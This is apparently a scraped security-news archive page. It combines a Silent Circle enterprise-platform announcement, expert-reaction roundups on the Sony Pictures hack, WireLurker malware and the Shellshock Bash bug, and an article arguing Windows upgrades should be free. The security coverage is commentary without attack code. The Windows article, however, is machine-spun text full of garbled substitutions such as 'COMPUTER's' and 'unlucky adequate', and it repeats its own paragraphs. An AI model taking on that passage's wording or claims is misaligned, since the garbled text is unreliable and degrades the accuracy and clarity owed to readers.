December 22, 2024

Silent Circle Unveils Enterprise Platform, New Devices

Posted on March 2, 2015 by in Security

Silent Circle Launches Enterprise Platform and New Devices Including Blackphone 2 and Blackphone+ Tablet

Silent Circle today unveiled two new devices as part of its Blackphone product line, along with a with new enterprise platform that combines devices, software and services into a privacy and security focused mobile architecture.

New hardware unveiled by the company includes the Blackphone 2 and the privacy focused tablet, Blackphone+.

Scheduled to be available in the second half of 2015, Blackphone 2 and offers hardware improvements over its predecessor, including a faster 8-core processor, three times more RAM, a longer lasting battery, the company said. The smartphone also integrates with existing Mobile Device Management systems and comes with a larger Full HD display.

Arriving later in 2015, the Blackphone+ tablet will offer privacy for mobile workers, the company said.

News of the enterprise platform and new hardware offerings comes just days after the company announced that it had agreed to buy out a joint venture with Geeksphone, giving Silent Circle a 100 percent ownership stake in SGP Technologies and full ownership of the privacy and security focused Blackphone product line. 

Offerings and enhancements coming as part of the new platform include:

PrivatOS 1.1 – The first major upgrade to the Android-based operating system created by Silent Circle introduces Spaces, an OS-level virtualization and management solution that enable devices to separate work from play. Geared specifically for the enterprise, PrivatOS allows users to keep enterprise and personal apps separate, while enabling IT administrators to lock and wipe enterprise managed ‘Spaces’ when necessary.

PrivatOS can also now integrate with several Mobile Device Management (MDM) platforms as a result of partnerships with Citrix, Soti and Good Technology.

Silent Suite, a set of core applications with peer-to-peer key negotiation and management, now includes Silent Meeting, a new, secure conference calling system that supports multiple participants. 

Aditional services offered as part of the enterprise platform include:

Silent Store – Installed on all Blackphone devices, the world’s first privacy-focused app store features apps from the developer community vetted by Silent Circle.

Silent World – An encrypted calling plan that lets users communicate privately with those who don’t have Silent Phone. Silent Worlds allows users to call anyone within the Silent Circle coverage areas privately, with no roaming charges or extra fees.

Silent Manager – Silent Manager gives enterprises a simple web based solution for managing plans, users and devices.

“Traditional security solutions have failed global enterprise in a mobile world and make data and privacy breaches feel inevitable to most enterprises,” said Mike Janke, Co-Founder and Chairman of the Silent Circle Board at a press conference held at Mobile World Congress 2015 this morning. “What’s more, these breaches have evolved and have much broader impact. They now put every customer, employee and partner at risk. They are eroding the trust people have in enterprises. They have moved privacy firmly to the top of the boardroom agenda.”

“Enterprises have been underserved when it comes to privacy,” said Bill Conner, President and CEO of Silent Circle. “Traditional approaches to security have failed them. We’re here to fix that. We have to understand that to achieve real privacy now requires security plus policy. That new equation is driving everything we do in building the world’s first enterprise privacy platform.”

In May 2014, Silent Circle announced that it had decided to move its global headquarters from the Caribbean island of Nevis to Switzerland, in order to take advantage of the country’s privacy laws. 

Last week, the company also announced that it had raised approximately $ 50 million in a private, common equity round to support accelerated growth.

Subscribe to the SecurityWeek Email Briefing

view counter

Managing Editor, SecurityWeek.

Previous Columns by Mike Lennon:


SecurityWeek RSS Feed

Industry Reactions to Devastating Sony Hack

Posted on December 5, 2014 by in Security

The systems of entertainment giant Sony have been hacked once again, and although the full extent of the breach is not yet known, the incident will likely be added to the list of most damaging cyberattacks.

Feedback Friday for December 5, 2014

A group of hackers called GOP (Guardians of Peace) has taken credit for the attack and they claim to have stolen terabytes of files. Sony admitted that a large amount of information has been stolen, including business and personnel files, and even unreleased movies.

On Friday, security firm Identity Finder revealed that the attackers leaked what appears to be sensitive personal data on roughly 47,000 individuals, including celebrities.

North Korea is considered a suspect, but the country’s officials have denied any involvement, and Sony representatives have not confirmed that the attack was traced back to the DPRK.

Researchers from various security firms have analyzed a piece of malware that appears to have been used in the Sony hack. The threat is designed to wipe data from infected systems.

The FBI launched an investigation and sent out a memo to a limited number of organizations, warning them about a destructive piece of malware that appears to be the same as the one used in the attack against Sony.

Some experts believe the FBI sent out the alert only to a few organizations that were likely to be affected. Others have pointed out that the FBI doesn’t appear to have a good incident response plan in place.

And the Feedback Begins…

Cody Pierce, Director of Vulnerability Research at Endgame:

“The latest FBI ‘flash’ report warning U.S. businesses about potentially destructive attacks references malware that is not highly advanced. Initial reports associate the alert with malware that overwrites user data and critical boot information on the hard drive, rendering the computer effectively useless. Based on analysis of the assumed malware sample, no technology exists within the sample that would warrant a larger alert to corporations. Additional information, either present in the malware–like IP address or host information–or during the investigation, also likely made it clear who required advance notification. Because of the malware’s low level of sophistication as well as the reportedly targeted nature of the attacks, it is entirely reasonable that the FBI would only inform a small number of companies.

The goal of these coordinated alerts is to raise awareness to the most likely targets so that they can ensure their security readiness, without unnecessary burden to those unlikely to be affected. In this case, because the malware is targeted and not sufficiently advanced, the FBI’s approach is justified. Conversely, in the event that more sophisticated malware or a new attack vector had been discovered, greater communication would have been necessary. Based on the information available, the FBI made the right decision in issuing this particular alert.” 

Mark Parker, Senior Product Manager, iSheriff:

 “For many organizations in the midst of breach investigation, decisions are often made very quickly. Without the luxury of planning meetings and impact analysis, some of the things are done in a ‘from the cuff’ manner based upon the evidence in hand, which may in fact be incomplete. In the case of the FBI memo that was sent out, it was done in a manner that was clearly done hastily. The threat posed by the malware was significant and a quick decision was made to send out an alert.

 

While I wasn’t in the room, I am fairly certain from having been in similar rooms, and in similar situations, that a list of who should receive the alert was not a very long conversation, and the point was to get the information out as soon as possible. What this demonstrates is that both Sony and the FBI do not have a good incident response plan in place for this type of incident. All organizations should have an incident response plan in place that lays out this sort of information in advance so that time is not spent on such issues. A clear process for key decisions is a very important part of any incident response plan, as is a list of who should be contacted in different situations.”

Steve Lowing, Director of Product Management, Promisec:

“Given that Sony Pictures is releasing a movie next month that satirizes assassinating North Korea’s supreme leader Kim Jong-Un, and after learning about this release last June declared war on the company, it’s widely held that the North Korean government is behind the attack. It’s likely that this is true at least at a sponsorship level given the number of attacks on South Korean banks and various businesses over the course of the last year, with the likely attackers being the country’s cyber warfare army known as unit 121.

Unit 121 is believed to be operating out of a Shenyang China luxury hotel giving them easy access to the world with being an arm’s reach from North Korea. The main reason for this is China’s close proximity to North Korea, North Korea’s almost non-existent internet access and China’s far superior network and cyber hacking resources. This is yet another example of State sponsored hacktivism targeting companies directly.”

Jonathan Carter, Technical Director, Arxan Technologies:

“So far, the evidence seems to suggest that the Sony hack was accomplished via execution of malicious malware. Hackers typically conduct these attacks by somehow tricking the user into executing something that is malicious in nature from within a system that is sensitive in nature. The recent iOS Masque and WireLurker vulnerabilities clearly illustrate that the delivery and execution of malicious code can take some very clever approaches. In light of these recent revelations, it is reasonable to expect to see a rise in distribution of malware (disguised as legitimate B2E apps that have been modified) via mobile devices owned by employees that have access to sensitive backend systems.”

Vijay Basani, CEO of EiQ Networks:

“It is possible that the hackers accessed not only unreleased movies, but also gained access to user accounts, celebrity passport details, sensitive trade secrets and know how. This demonstrates that in spite significant investments in traditional and next-gen security technologies, any network can be compromised. What is truly required is a total commitment from the senior management to building a comprehensive security program that delivers pro-active and reactive security and continuous security posture.”

Craig Williams, Senior Technical Leader and Security Outreach Manager for Cisco’s Talos team: 

“The recent FBI ‘flash alert’ was published covering the dangers of a new wiper Trojan that has received quite a bit of media attention. There are a few key facts that seem to be overlooked by many of the early news accounts of this threat:

Cisco’s Talos team has historic examples of this type of malware going back to 1998.  Data *is* the new target, this should not surprise anyone – yet it is also not the end of the world.  Recent examples of malware effectively “destroying” data – putting it out of victims’ reach – also include Cryptowall, and Cryptolocker, common ransomware variants delivered by exploit kits and other means.

Wiping systems is also an effective way to cover up malicious activity and make incident response more difficult, such as in the case of the DarkSeoul malware in 2013.

Any company that introduced proper back-up plans in response to recent ransomware like Cryptolocker or Cryptowall should already be protected to a degree against these threats detailed by the FBI.  Defense-in-depth can also detect and defeat this type of threat.”

Carl Wright, general manager at TrapX Security:

“The FBI and other national government organizations have an alerting process that we are sure they followed to the letter. It is important for them to provide an early warning system for these types of attacks, especially in the case of the Sony breach, because of the severe damage that could ultimately be used against our nation’s critical infrastructure.

Timely information sharing must be completely reciprocal in nature, meaning, corporations also have to be willing to share their cyber intelligence with the government.

 

When we look at the significant incidents of 2014 and in particular Sony, we see that most enterprises are focusing efforts and investments on breach prevention. 2014 has clearly highlighted the need for corporations and government to include additional technological capabilities that better detect and interdict breaches before they can spread within an organization.”

Ian Amit, Vice President, ZeroFOX:

“The Sony breach is a tricky situation. How it occurred is still up for debate – possibly nation state? Possibly an insider? Possibly a disgruntled employee? Regardless, it’s clear the breach goes very deep. It has gotten to the point that Sony is outright shutting down its network. This means even the backups are either nonexistent or compromised, and the hackers likely got just about everything, making this one of the worst breaches ever at an organization of this size. The attack touches anyone involved with Sony – auditors, consultants, screenwriters, contractors, actors and producers. The malware might be contained on Sony’s servers, but the data loss is much further reaching. Make no mistake, this breach is a big one.

I am skeptical this attack is nation state-level attack. The idea that North Korea is retaliating against Sony for an upcoming film is a wildly sensationalist explanation. Hackers regularly cover their trails by leaving red herrings for the cleanup crew – indications that the Russians, Chinese, Israelis, North Koreans and your grandmother were all involved. A small script of Korean language is hardly damning evidence. Code can be pulled from a variety of sources and there is no smoking gun (yet) in the case of the Sony breach.”

Oliver Tavakoli, CTO, Vectra Networks:

“Any malware that destroys its host will have limited impact unless it is part of a larger coordinated attack. One or two laptops being wiped at Sony would be a nuisance, but large numbers of devices being wiped all at once is devastating. The latter style of attack requires an attacker to achieve a persistent network-level compromise of the organization before the wiper malware even becomes relevant.

The information released as part of the FBI alert bears this out. The malware sample detailed in the alert was compiled only days before it was used. This is a strong sign that Sony was compromised well before the time the malware was built, and the wiper malware was the coup de grâce at the end of the breach.

This is particularly significant when evaluating the FBI alert. Sharing indicators of compromise (IoC) is a good thing, and the industry needs more of this sharing. But we need to keep in mind that these particular indicators represent the absolute tail end of a much longer and widespread attack. In fact, some of the IoCs detailed in the alert are only observable once the wiper malware has begun destroying data. Obviously, this sort of indicator is much too late in the game, but too often is the only indicator that is available. What the industry needs badly are indicators of attack that reveal the compromise of the organization’s network at a point when security teams can still prevent damage.”

Kenneth Bechtel, Tenable Network Security’s Malware Research Analyst:

 “This type attack is not new, it’s been around for a long time, with multiple examples. The most recent similarity is the ransomware that’s been attacking systems. These attacks are often difficult to detect prior to the execution of the payload. The best thing is a good backup scheme as part of your response. Many times the answer to modern malware infections is to reimage the system. In case this occurs on your system, a reimage is often the best response. The only thing that reimaging would not solve is having most current data like documents and spreadsheet. It’s this combination of reimaging and restoring backups that is the most efficient response to the attack. While this ‘fixes’ the host, network forensics should be done to identify the attack and create defenses against the attack in the future.”

Jon Oberheide, CTO, Duo Security:

“I don’t believe that the limited distribution of the FBI warning was improper. But, I think the scope and focus on data-destroying malware was a bit misguided.

 

Certainly data loss can have a big impact on the operations of a business. We saw that big time back in 2012 with the Saudi Aramco attack by data-wiping malware. But, regardless of whether the data loss is intentional or inadvertent, it’s vital to have proper disaster recovery and business continuity processes in place to be able to recover and continue operation. However, when considering a sophisticated cyber-attack, disaster recovery processes must assume that an attacker has more capabilities and reach than standard inadvertent data loss events. For example, an attacker may have access to your data backup infrastructure and be able to destroy backups as well. So, modern organizations may have to revisit their DR/BC models and take into account these new threat models.

The real impact of the Sony breach is not the destruction of data, but the longer term effects of confidentiality and integrity of their data and infrastructure. Rebuilding all their infrastructure post-breach in a trusted environment is an incredibly challenging and arduous task. The disclosure of credentials, infrastructure, critical assets, employee PII, and even things like RSA SecurID token seeds will have a much longer-term, but more under-the-radar, impact on Sony’s business.

Most importantly, in the modern day, breaches don’t only impact the directly-affected organization, but they tend to sprawl out and negatively impact the security of all organizations and the Internet ecosystem as a whole. A breach doesn’t happen in a vacuum: stolen credentials are re-used to gain footholds in other organizations, stolen source code is used to find vulnerabilities to assist future attacks, and information and experience is gleaned by attackers to hone their tactics, techniques, and procedures.”

Idan Tendler, CEO of Fortscale:

“The traditional concept for security was to keep the most important resources, i.e. the vaults with the cash (or in Sony’s case, films) safe. What we’re seeing with breaches of this magnitude is that the harm now goes far beyond any immediate and limited capital damage. Leaked sensitive information regarding employee salary and healthcare has the potential to cause enormous reputational harm and internal turmoil within a workforce. Revealing that kind of data can lead to jealousy, resentment and distrust among workers and create a very toxic work environment.

With news of passwords to sensitive documents also being leaked, Sony will need to be more vigilant in securing user access to resources by constantly monitoring and analyzing user activity for possible credential abuse.”

Clinton Karr, Senior security specialist at Bromium:

“These attacks are troublesome, but not surprising. Earlier this year we witnessed Code Spaces shutdown after a successful attack destroyed its cloud back-ups. Likewise, the evolution of crypto-ransomware suggests attackers are targeting the enterprise with destructive attacks. These attacks are unlike the “cat burglary” of Trojan attacks, but much more brute force like a smash-and-grab or straight vandalism.”

Ariel Dan, Co-Founder and Executive VP, Porticor:

“Reporting the technical details of a specific attack is a sensitive topic. Attack details can and will be used by new hackers against new targets. On the other hand, companies can’t do much to defend against a type of attack they know very little about. One relevant example of such a potential attack was around a severe security bug in the Xen virtualization system that exposed cloud users of Amazon Web Services, Rackspace and other cloud providers. The cloud vendors had stealthily patched affected systems, issued a vague notification to their users of an immediate restart action, and only after it was all done was the attack realized and publicized. Reporting the bug prior to fixing the problem would have a devastating effect on cloud users.

 

Back to the Sony attack: I personally believe that reporting the entire details of a security breach can do more harm than good, but there should be a way to communicate enough meaningful information without empowering the bad guys. Blogs like KrebsonSecurity provided additional details, including a snort signature to detect this specific attack. Such data is meaningful for the defender and does not help an attacker. From this information we learned that organizations should embrace an “encrypt everything” approach as we step into 2015. We should be able to guarantee that data is not exposed even if an organization has been infiltrated.”

Tim Keanini, CTO at Lancope:

“I think the question being asked here is a great opportunity to describe the threats of yesterday versus the threats we face today.  In the past, broad advisories on technical flaws were effective mainly because the problem was universal.  Attackers would automate tools to go after technical flaws and there was no distinction between exploitation of a large corporation or your grandmother. If the vulnerability existed, the exploitation was successful.  In the case of Sony, we are talking about a specific adversary (Guardians of Peace) targeting Sony Pictures and with specific extortion criteria.  With this type of advanced threat, warnings sent out by the FBI on the investigation itself will be less prescriptive and more general making its timeliness less of a priority. 

From everything we have seen disclosed so far, it is difficult to assess and advise on the information security practice when some of the flaws exploited seem to suggest very little security was in place.  The analogy would be: it would be hard to assess how the locks where compromised when the doors to host the locks were not even present.   For example, some of the disclosure on reddit earlier in the week suggests that some files named ‘passwords’ were simply in the clear and stored unencrypted in txt and xls files.  The investigation will determine the true nature of all of this speculation but I use this as an example because the FBI could issue a warning every day of the week that said “Don’t do stupid things” and be just as effective.

The lesson learned here is that if you are connected to the Internet in any shape or form, this type of security breach happening to you and your company is a very real risk.  Step up your game before you become the subject of another story just like this.  It would be weird but Sony Pictures should write a movie on how a cybercrime group completely comprised and held an entertainment company for cyber extortion – categorized under non-fiction horror.”

Kevin Bocek, Vice President of Security Strategy & Threat Intelligence at Venafi:

“As the FBI, DHS and others investigating the Sony hack work furiously to uncover the details and the threat actors behind this breach, it’s important that we recognize the attack patterns that are right in front of our face: cybercriminals are and will continue to use the same attack blueprint over and over again. Why? Because they use what works.

In April 2011, Sony’s PlayStation Network was breached where asymmetric keys were stolen, compromising the security of 77 million users’ accounts. Now, nearly four years later, Sony is still facing the same threat — only this time it’s directed on Sony Pictures Entertainment. In this latest breach, cybercriminals successfully gained access to dozens of SSH private keys – the same way they stole private keys in the Mask, Crouching Yeti and APT18 attacks. Once these keys are stolen, the attackers can get access to other systems — and then it just goes from bad to worse. It’s critical that incident response and security teams realize that the only way that the attackers can *truly* be stopped from accessing these systems is by replacing the keys and certificates. Until then, they will continue to wreak havoc and cause more damage with elevated privileges, the ability to decrypt sensitive data in transit, and spoof systems and administrators. All it takes is one compromised key or vulnerable certificate to cause millions in damages. Hopefully, Sony will learn its lesson this go round.”

Until Next Friday… Have a Great Weekend!

Subscribe to the SecurityWeek Email Briefing

view counter

Previous Columns by Eduard Kovacs:


SecurityWeek RSS Feed

Feedback Friday: WireLurker Malware Targets Mac OS X, iOS – Industry Reactions

Posted on November 8, 2014 by in Security

Researchers at Palo Alto Networks identified a new piece of malware designed to target Mac OS X and iOS users. The threat, called WireLurker, has potentially affected hundreds of thousands of users, almost all of them located in China. 

Cybercriminals are distributing the threat by trojanizing OS X apps hosted on third party app stores. The 467 malicious apps uploaded to the Maiyadi App Store have been downloaded more than 350,000 times.

Feedback Friday: WireLurker Malware

Once it infects a Mac, the malware downloads other malicious iOS application to the infected machine. When victims connect their iPads, iPhones or iPods via USB to the infected device, WireLurker installs the downloaded iOS applications onto them. The mobile component of WireLurker is capable of stealing information from infected devices.

The latest version of WireLurker is interesting because it can infect not only jailbroken devices, but also ones that haven’t been jailbroken. The threat can install the malicious iOS apps on non-jailbroken devices by signing them with a stolen code signing certificate.

Shortly after Palo Alto Networks disclosed details on WireLurker, researchers identified an older variant of the threat apparently designed to target computers running Microsoft Windows. 

The command and control servers used by the malware are currently offline and Apple has revoked the certificate used by the malware authors. However, experts believe WireLurker once again shows that Apple devices are not immune to malware.

And the Feedback Begins…

Ian Amit, Vice President of ZeroFOX:

“It’s interesting to see how malware is getting more holistic from an attack vector approach, utilizing technical vulnerabilities and elements, as well as human ones. This isn’t the first malicious code that is designed to “hop” between connected platforms, examples date back to variants such as Stuxnet that infected Windows based computers, which in turn affected Siemens PLCs. This is an interesting turn of events, as Apple’s iPhone is commonly considered a safe platform as long as it isn’t jailbroken.

Beyond the already familiar abuse of social interactions that allow the malware to run in the first place – essentially, having the victim ‘knowingly’ install it, WireLurker also abuses the trust between the victim’s PC and the iPhone connected to it, which grants it full access to the phone and it’s applications – apps can be backed up over USB, then restored to the phone, after the malware has modified them and inserted a backdoor.”

Greg Martin, CTO of ThreatStream:

“Wirelurker is being distributed via a 3rd party app-store called Maiyadi that is out of control of Apple.

The danger with third-party app stores such as Maiyadi is that Apple and Google have no vetting control of what gets added to 3rd party app stores, severely limiting their ability to protect end-users from running malicious apps. In-fact nearly all cases of known malware for the iPhones have originated from 3rd party app stores such as Cydia (App store for jailbroken iPhones) and now new ones like Maiyadi.

Monitoring these 3rd party app stores for malicious apps will become an opportunity for cyber security companies to help provide intelligence back to Apple and Google on what’s happening outside of their control.”

Steve Bell, security consultant, BullGuard:

“The really interesting thing about the WireLurker malware is the scale of the infection and how it is promulgated.  Because of the proprietary nature of Apple devices and the fact that apps are checked for malware before they go into the Apple store users have generally been protected in the past.

However, with an estimated 350,000 downloads of infected apps and the fact that the malware can also transfer via a USB port signals a serious notching up of hacker’s endeavours to hit Apple devices. In the US Apple users tend to stick to the Apple store which is wise. WireLurker shows precisely the danger of downloading apps from unregulated third party stores.

However, the use of a USB port to also transfer malware, while obvious and simple, could be potentially devastating. Without wishing to be alarmist, USB ports are an obvious vulnerability, and it’s not beyond the realms of possibility that hackers might use this to insert Trojans designed to lie dormant for a period. With Apple now putting its considerable weight behind Apple Pay, hackers have serious motivation.”

Carl Wright, General Manager for TrapX Security:

“What has enabled the success of the creators of WireLurker is the concept of transitive trust. This two-way approved relationship automatically created between parties has long been an Achilles heel to security professionals trying to ensure the validity of transactions on a more or less case by case bases.

This recent hack continues to illustrate the trade-off the end users must consider between that of maintaining security of the end point device and innovative new applications that may not be developed or certified by Apple.

In the end, the price may indeed be too extreme for corporations who desire to take advantage of end user BYOD.”

Jared DeMott, Security Researcher with Bromium Labs:

 “People still seem to think malware on the Mac is less likely than on Windows.  If this is true, it’s simply because attackers are less interested in Mac.  The relative attack surface is just as big (similar chance to find and exploit bugs) as on Windows or any other modern operating system.

In fact, my suspicion is that Macs really are exploited more than people realize.  But it’s either typically by better funded attackers, who know how to stay hidden, or because Apple in general does a better job at managing bad security press when compared to Windows.

This particular malware is distributed not in the form of an exploit, but in the form of pirated software.  China in particular, is known to run a lot of illegal software.  Thus, it’s not surprising the Chinese took the brunt of this round, considering the deployment mechanism.”

Mark Parker, Senior Product Manager, iSheriff:

“Wirelurker introduces a new threat vector in a place that was thought to be secure. The concept of using trojan software to download new threats is not new, that is something that has been in practice for many years. However, up to this point the software on iOS devices has been considered secure since the only software on the device would come through the heavily vetted Apple App Store.

By using the workstation’s USB connection as an avenue to surreptitiously install the Trojan applications, the protection afforded by the App Store is leap frogged in an effective manner. Since it has shown success, there is sure to be more advancement and copycats. The introduction of the mobile phone as a method of payment will increase the potential for attacks. Wherever there is money, there is always going to be Malware built to try to get access to that money.

This approach of using the workstation USB connection to another device could also be used in other “closed system” environments. Examples of this could be physical security system maintenance, or point-of-sale terminals that can only be maintained via a workstation USB connection, or similar method. It is always important to ensure that all workstations, even those of workers off-site, are protected from endpoint, web, and email based attacks at all times. The need for security doesn’t stop when the device leaves the network, especially in cases of workers that will be connecting to these types of devices.”

Kenneth Bechtel, Malware Research Analyst, Tenable Network Security:

 “With a resurgent BlackEnergy now targeting network routers and WireLurker spreading like wildfire across China’s iOS devices, this has been an interesting week to be in the malware business. But the thing to keep in mind is that despite the hype, neither of these threats herald an impending Internet apocalypse, though both deserve to be taken seriously.

WireLurker infects iOS through compromised OS X machines. Following successful malware trends, it is modular and updateable, having 467 applications hosted on the Maiyadi App Store (a third-party store hosted in China). This threat can now infect non-jail broken iOS devices simply by connecting an iPhone/ iPad/ iPod to a computer to sync the calendar or contacts list. This concept is very frightening to many users, and means it won’t be long before it spreads to countries outside of China.”

Michael Sutton, VP of Security Research for Zscaler:

 “We keep waiting for mobile malware to eclipse traditional PC malware but it turns out that we’re waiting for the wrong thing. We’ll never see the drive by downloads and fast spreading device to device malware that we’ve become accustomed to in the Windows world, due to the differing architectures of Windows vs Mobile operating systems. That doesn’t however mean that malware on mobile devices isn’t a concern, it just means that malware is being forced to evolve and adapt to a more restrictive environment.

This is especially true for iOS devices and WireLurker represents a new advance on that front. Whether or not Apple designed their Walled Garden for security purposes or not, the fact that iOS apps must primarily be installed only from the iOS App Store, where they can first be vetted by Apple, has made malicious apps on non-jailbroken devices a rare commodity. WireLurker took advantage of an exception to this rule.

WireLurker abuses the fact that there is another way to get apps onto non-jailbroken devices. Apple allows enterprise development teams to leverage Enterprise Provisioning as a means to push homegrown apps to employees without the hassle of hosting them in the App Store. The process is still restricted and requires the use of an Apple supplied code signing certificate and provisioning profiles pushed to devices, but it does provide an alternative. The authors of WireLurker appear to have stolen a legitimate code signing certificate from Hunan Langxiong Advertising Decoration Engineering Co. Ltd., in order to pushed apps to non-jailbroken devices via provisioning profiles.”

Steve Hultquist, chief evangelist at RedSeal:

“Trust. It’s the first requirement for security, but seldom considered by consumers. In the case of WireLurker, existing trust between an iOS device and a Mac becomes the surrogate for malware to infect the devices. When the Mac user mistakenly places trust in a third-party app site to only offer uninfected applications for download, it opens the door to infection of the Mac and then the iOS devices.

This is another example of the sophistication and automation of attacks that are growing inexorably into the future. Attackers are both more subtle and more capable than ever before. This attack resulted in over a quarter of a million infected downloads, in all likelihood impacting thousands of people and devices, all because of misplaced trust.

This attack and others that will follow underscore the need for proactive security efforts, from application design-for-security to trust architectures and automated analysis of potential access paths. Without automated proactive prevention, attacks will continue to grow in volume and impact. Enterprises need to take notice, since these consumer attacks are merely the ice above the water. The enterprise and governmental attacks are the bulk under the sea.”

Until Next Friday…Have a Great Weekend!

Previous Columns by Eduard Kovacs:

Tags:


SecurityWeek RSS Feed

The future of Microsoft depends upon Windows being free of cost

Posted on October 13, 2014 by in Microsoft Windows

Keep in mind the days when you would head out to the shop to pick up the most recent model of Windows, on DVD, for something like $130? Or if you were unlucky adequate to not get upgrade pricing, possibly also $239? Those days may appear in the far-off past, however in truth Microsoft is still billing for upgrades in between major variations even as of Windows 8.1.Yet this isn’t really going to be the future of Microsoft; the days of billing for upgrades are over and the business is being slowly backed right into a corner by the style of free upgrades on mobile as well as Apple completely taking out OS upgrade pricing on Mac. Consumers just aren’t willing to spend for upgrades any longer, as an alternative, they anticipate them to be free for the majority of the life time of a device.

The worth of OS upgrades has actually been entirely shed in a time where we’re useded to getting complimentary updates to cell phones as long as they can continuously deal with the software program. Why does this same design not apply to the PC yet? Microsoft has taken on cost-free upgrades for Windows Phone already, so why not for the COMPUTER?

Microsoft has remained peaceful on what its prepare for Windows rates in future, yet did make it free of cost for customers to update from Windows 8 to 8.1 as well as we understand the upgrade from 8 to 10 will be free, however will this proceed? The company lately revealed Windows 10 however didn’t detail whether it would be an additional free upgrade or otherwise; nevertheless, it probably should be a totally free upgrade for a lot of Windows customers.

It requires to decouple the business and consumer markets if Microsoft wishes to preserve it’s iron hold on the future COMPUTER market. It’s entirely sensible to expect businesses to pay to authorized software– even if just to get extended updates as well as assistance– yet expecting completion individual to care sufficient to invest over $100 to update every 2 years is absurd.

For lots of consumers, Windows upgrades are straight tied to when they change their COMPUTER’s. Why else would certainly numerous individuals not also bother to update from XP? Their PC’s are flawlessly efficient in running Windows 7, however why would they wish to pay $130 merely to obtain the most up to date software application? Change could be tough and instead of troubling to pay and also upgrade for a new permit, these customers have actually chosen to remain on unsupported versions due to the fact that it ‘works’ fine.

Making Windows complimentary has a variety of tangible perks for Microsoft; not just does it urge customers to update frequently (and takes out mostly all barriers to doing so), it suggests that users are more likely to make use of the most up to date version of Microsoft products and connected services. It additionally means that Microsoft could eliminate all the perplexing and also needless SKU options and concentrate on 2 markets: consumer and venture.

Envision Windows 10 was made free of cost for all users from Vista as well as up– the install base would rapidly move to the latest variation (similar to OS X users, or iOS users flock to the latest release), suggesting less heritage support for Microsoft and the capacity to promote bigger numbers. The firm might simply have a different version and a demand for those using Windows in company situations.

Because it’s cost-free for numerous residence users to obtain the most recent model of Windows, it seems likely that these exact same users would be much more about to spend for associated services using registration as an alternative, like OneDrive or Office365, which would certainly total up to a lot a lot more repeating profits for the company.

I anticipate that Microsoft has actually already pertained to this same, unpreventable verdict and will certainly make Windows 10 complimentary for those utilizing Windows 7 as well as up. It’s most likely a tough choice for the company– Windows is a $5 Billion a year business– yet it’s a crucial one, that it has to make in order to stay appropriate.

As less and fewer PC’s are sold each year, the business should look for various other methods to generate income by offering assisting solutions on a longer term basis as opposed to attempting to persuade individuals to dip the money on an upgrade every three years.

Consumers simply aren’t purchasing brand-new computers any longer as they last longer or change to depending phones as well as tablet computers, so Microsoft has to seek brand-new means of obtaining revenue, beyond Windows. Windows will become the conduit for consumers to acquire Microsoft solutions.

The days of paid Windows upgrades have fulfilled their end, even if Microsoft hasn’t already confessed it.

Photo credit history: Getty Images

There are a few slots left for our UX Style program. Get your own today.

Keep in mind the days when you would certainly move out to the shop to select up the most current variation of Windows, on DVD, for something like $130? Those days could appear in the remote past, yet in truth Microsoft is still charging for upgrades between significant models also as of Windows 8.1.

Microsoft has taken on free of cost upgrades for Windows Phone already, so why not for the PC?

For several consumers, Windows upgrades are directly linked to when they replace their COMPUTER’s. Their COMPUTER’s are completely capable of running Windows 7, yet why would certainly they wish to pay $130 simply to obtain the most recent software?

  • By Owen Williams, thenextweb.com
  • View First

 

Feedback Friday: ‘Shellshock’ Vulnerability – Industry Reactions

Posted on September 28, 2014 by in Security

The existence of a highly critical vulnerability affecting the GNU Bourne Again Shell (Bash) has been brought to light this week. The security flaw is considered by some members of the industry as being worse than the notorious Heartbleed bug.

Feedback Friday

GNU Bash is a command-line shell used in many Linux, Unix and Mac OS X operating systems. The vulnerability (CVE-2014-6271) has been dubbed “Bash Bug” or “Shellshock” and it affects not only Web servers, but also Internet-of-Things (IoT) devices such as DVRs, printers, automotive entertainment systems, routers and even manufacturing systems.

By exploiting the security hole, an attacker can execute arbitrary commands and take over targeted machine. Symantec believes that the most likely route of attack is through Web servers that use CGI (Common Gateway Interface). There have already been reports of limited, targeted attacks exploiting the vulnerability.

A patch has been made available, but it’s incomplete. Until a permanent fix is rolled out, several organizations have launched Shellshock detection tools. Errata Security has started scanning the Web to find out how many systems are affected, and Symantec has published a video to demonstrate how the flaw can be exploited.

The security community warns that the vulnerability can have serious effects, and points out that it could take a long time until all systems are patched.

And the Feedback Begins…

Ian Pratt, Co-founder and EVP at Bromium:

 “The ‘shellshock’ bash vulnerability is a big deal. It’s going to impact large numbers of internet-facing Linux/Unix/OS X systems as bash has been around for many years and is frequently used as the ‘glue’ to connect software components used in building applications. Vulnerable network-facing applications can easily be remotely exploited to allow an attacker to gain access to the system, executing with the same privilege the application has. From there, an attacker would attempt to find a privilege escalation vulnerability to enable them to achieve total compromise.

Bash is a very complex and feature-rich piece of software that is intended for interactive use by power users. It does way more than is typically required for the additional role for which it is often employed in gluing components together in applications. Thus it presents an unnecessarily broad attack surface — this likely won’t be the last vulnerability found in bash. Application developers should try to avoid invoking shells unless absolutely necessary, or use minimalist shells where required.”

 

Mark Parker, Senior Product Manager at iSheriff:

 “This bash vulnerability is going to prove to be a much bigger headache than Heartbleed was. In addition to the general Mac OS X, Linux and Unix systems that need to be patched, there are also thousands upon thousands of Internet connected Linux and Unix based embedded devices, such as DVRs, home automation systems, automotive entertainment systems, mobile phones, home routers, manufacturing systems and printers.

Most of these devices will be susceptible because most Linux based devices run bash, it is such an integral part of the Linux OS. I anticipate that we will be continue to see the fallout from this vulnerability for a long time to come.”

Carl Wright, General Manager of TrapX Security:

“We feel that industry will take this very seriously and come out with patches for this vulnerability ASAP. It could take us years to understand how many systems were compromised and how many were used to escalate privileges into systems without this vulnerability. The transitive trust nature of directory architectures and authentications systems could mean we are living with this far beyond patching the current systems if this exploit has been taken advantage of even at a small 1% level.”

Coby Sella, CEO of Discretix:

“This is the second time over the last six months when a key infrastructure component used by billions of connected things across a variety of industries has been compromised. We see this problem only getting worse as more and more unsecured or not adequately secured things are rolled out without any comprehensive security solution that reaches all the way down to the chipset. Real solutions to this problem must cover every layer from the chipset to the cloud enabling companies to remotely insert secrets into the chipset layer via secured connections within their private or cloud infrastructure.”

Nat Kausik, CEO, Bitglass:

“Enterprises with ‘trusted endpoint’ security models for laptops and mobile devices are particularly vulnerable to this flaw.  Malware can exploit this vulnerability on unix-based laptops such as Mac and Chromebook when the user is away from the office, and then spread inside the corporate network once the user returns to the office.”

Steve Durbin, Managing Director of the Information Security Forum:

